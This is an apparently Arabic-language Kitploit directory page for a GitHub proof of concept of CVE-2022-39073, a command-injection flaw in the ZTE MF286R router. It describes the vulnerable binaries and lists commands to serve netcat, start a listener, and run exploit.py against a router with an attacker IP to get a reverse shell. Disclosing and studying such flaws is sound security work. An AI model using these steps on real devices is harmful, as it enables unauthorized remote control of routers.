Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-39073 — إثبات مفهوم لثغرة حقن الأوامر التي تؤثر على راوتر ZTE MF286R، بما في ذلك استغلال RCE. | Kitploit
أدوات/GitHubGitHub/v0lp3/cve-2022-39073
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubv0lp3/cve-2022-39073

CVE-2022-39073

إثبات مفهوم لثغرة حقن الأوامر التي تؤثر على راوتر ZTE MF286R، بما في ذلك استغلال RCE.

عرض المستودع
114منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-39073

تفاصيل البرنامج الثابت:

root@kitploit:~
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10

المتطلبات الأساسية

  • requests (pip install requests)

حقن الأوامر

الثغرة عبارة عن حقن أوامر مشترك بين الملف الثنائي zte_net_link_detect ومعالج WATCH_DOG_SWITCH في الملف الثنائي لخادم الويب goahead.

لاحظ أنه يمكن استغلال الثغرة فقط عندما يكون الموجّه متصلاً بشبكة WAN أو متصلاً بالإنترنت عبر بطاقة SIM. (يجب أن تكون قيمة مفتاح "ppp_status" هي "ppp_connected" أو "ipv4_ipv6_connected" أو "ipv6_connected").

المخاطر

  • تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • تنفيذ أوامر اعتباطية

إثبات المفهوم

فكرة الاستغلال هي تنزيل الملف الثنائي الثابت لـ netcat من خادم http ثم فتح قشرة عكسية (reverse shell) به. ملاحظة: إصدار netcat المضمّن في هذا المجلد هو big endian.

  • شغّل خادم http في هذا المجلد python3 -m http.server 8080
  • افتح مقبس استماع على المنفذ 9999 باستخدام nc -lvp 9999
  • شغّل البرنامج النصي في هذا المجلد python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>

المراجع

تم الإبلاغ عن هذه الثغرة بواسطة Andrea Maugeri في سبتمبر 2022. https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664

تنزيل الأداة